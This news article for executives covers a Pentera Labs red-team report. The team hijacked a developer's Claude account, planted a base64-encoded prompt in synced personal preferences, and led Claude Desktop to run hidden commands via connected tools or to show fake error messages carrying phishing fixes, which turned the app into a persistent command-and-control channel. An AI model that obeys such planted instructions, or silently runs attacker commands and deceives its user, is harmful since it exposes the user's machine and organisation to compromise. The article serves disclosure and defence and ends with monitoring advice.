Pentera red-team poisoned Claude Desktop via synced preferences to get full remote code execution

A “feature, not a bug” lets attackers turn a trusted AI desktop app into a persistent foothold on real machines.

ByLama Al-RashidTechnology Correspondent, The Executives Brief

about 22 hours ago·5 min read

Pentera red-team poisoned Claude Desktop via synced preferences to get full remote code execution

Executive summary

Pentera Labs’ red team says it compromised a developer through the Claude Desktop app, starting with a stolen inbox and ending in full remote code execution. For leaders, the consequence is simple: agentic AI with local execution can become an attacker’s control plane if trust signals are abused.

Pentera Labs says its red team turned Claude Desktop into a practical double agent by poisoning a developer's Claude account settings, then using that synced, “trusted” access to achieve full remote code execution. The key idea is not that Claude is “bad,” but that Claude Desktop is designed to do real work on a real computer. When attackers can manipulate what the assistant is allowed to do, it stops being a chatbot and starts acting like a stealthy operator.

Dvir Avraham, Pentera’s offensive security services team leader, and research technical lead Reef Spektor describe the chain in a report shared in advance with The Register, set to publish Wednesday. Avraham told The Register in a phone interview that “we used this trust to manipulate the victim, like under the hood, the victim didn't see it coming.” He also said the experience made him “a little bit paranoid,” leading him to say he is not “allowing any command to run without me examining it twice.” If you run, govern, or fund agentic AI pilots, that tension is the story: trust is the vulnerability surface.

So how does the double-agent behavior get in? According to Pentera, the attackers started with a red-team assignment on a third-party platform that aggregates customer email inboxes into a single management interface. Avraham and Spektor declined to name the platform and declined to explain exactly how they gained access. What they will say is the prerequisite: the attacker needed a compromised inbox, and they also stated that “any compromised inbox would work,” because the goal was to get into the victim’s Claude account.

Breaking into an email inbox is not presented as a research superpower. Pentera frames it as a problem attackers already know how to solve, whether through a third-party inbox management platform, phishing link, social engineering password reset, or even AI agents. The more dangerous twist is that, once the Claude account is compromised, the Claude Desktop app becomes the on-ramp to local execution.

Anthropic’s desktop app works across macOS, Windows, and Linux. It provides the same AI chat as claude.ai and syncs across devices and sessions tied to the user’s account. Pentera’s researchers say they asked, “can we leverage the sync behavior to infect other sessions and devices? (hint: yes!).” Their report also connects directly to the modern “agentic” feature set: as of January, Claude Desktop includes Cowork for longer agentic tasks and Code for software development. In Pentera’s November 2025 research, they said Cowork and Claude Code were not available yet, so they needed a way to execute commands because the objective was to take over the machine.

That is where Claude Desktop’s personalization features come in. These are account-wide settings that define how the AI responds, including communication instructions and project workflow roles. Pentera says the team created a base64-encoded prompt that instructed Claude to check for command-capable tools on the developer’s machine and execute the command if available, or generate a fake error if not. Then they pasted that prompt into the victim’s personal preferences on Claude. Because these preferences sync across devices, Pentera says the poisoned instructions are loaded “behind the scenes” the next time the user opens Claude Desktop and types in chat. The user thinks they are interacting normally, while Claude is silently enumerating extensions and tools.

If the victim already has a command-capable connector installed, the poisoned instructions can tell Claude to use it to trigger a stealthy reverse shell or other malicious code. Avraham said, “And from there it's full compromise of the machine.” If the user does not have command-capable tools installed, Pentera describes Claude becoming a “phishing layer.” The injected prompt directs Claude to show a realistic error as soon as the victim asks a question, including a realistic-looking error code, a link that purports to be a fix, and step-by-step instructions. Avraham said the team used links “from the actual Anthropic site, with known emojis that the AI loves.” Pentera argues that because users tend to trust their AI assistant, they will likely click and execute the attacker-controlled command.

In the specific case Pentera tested, they had Claude curl a remote server they controlled on every interaction, fetching and executing bash commands. That allowed the researchers to rotate commands server-side, effectively turning Claude into a persistent, stealthy C2 agent that the victim kept feeding through routine chat. After compromising the developer’s workstation, Pentera says they used various attack vectors they declined to describe to move laterally inside the company, citing customer privacy and proprietary methods. Spektor added an important business detail about why developers are such a useful initial target: developers often have access to secrets such as API keys, tokens, and cloud credentials. That means compromise of a single workstation can become an entry point into an organization’s larger cloud environment, enabling theft of source code and other sensitive data, poisoning internal git repositories, and other enterprise pain that has played out across recent attacks.

Pentera reported the findings to Anthropic in November. Anthropic’s response, as quoted in The Register article, frames the behavior as “a feature, not a bug.” Anthropic said it reviewed the submission and determined “this doesn't represent a security vulnerability that falls within our program scope.” It also stated that its threat model treats personal preferences, skills, and MCP connectors as features that can execute code through Claude Desktop by design, and that while those features can be leveraged to execute arbitrary code when manipulated, it is expected functionality rather than a security vulnerability in Anthropic’s infrastructure. The Register reached out to Anthropic for further comment and did not receive a response.

This is the regulatory and governance wrinkle for decision-makers: if agentic AI platforms treat local execution capabilities as “by design,” then the burden of control shifts toward identity security, configuration hygiene, endpoint monitoring, and incident-ready process. Spektor’s suggestions align with that shift. For users, the guidance is to pay close attention to what the AI can do on the machine, and not blindly follow install prompts or error messages. For security teams, Pentera recommends treating AI desktop apps as “privileged software,” because they can execute code, read files, and interact with local tools. They also urge monitoring for changes of AI assistant configurations and synced settings. If you are running agentic pilots, this is the moment to assume that “chat trust” is not a safety control. It is a delivery channel.

Executive ActionsLocked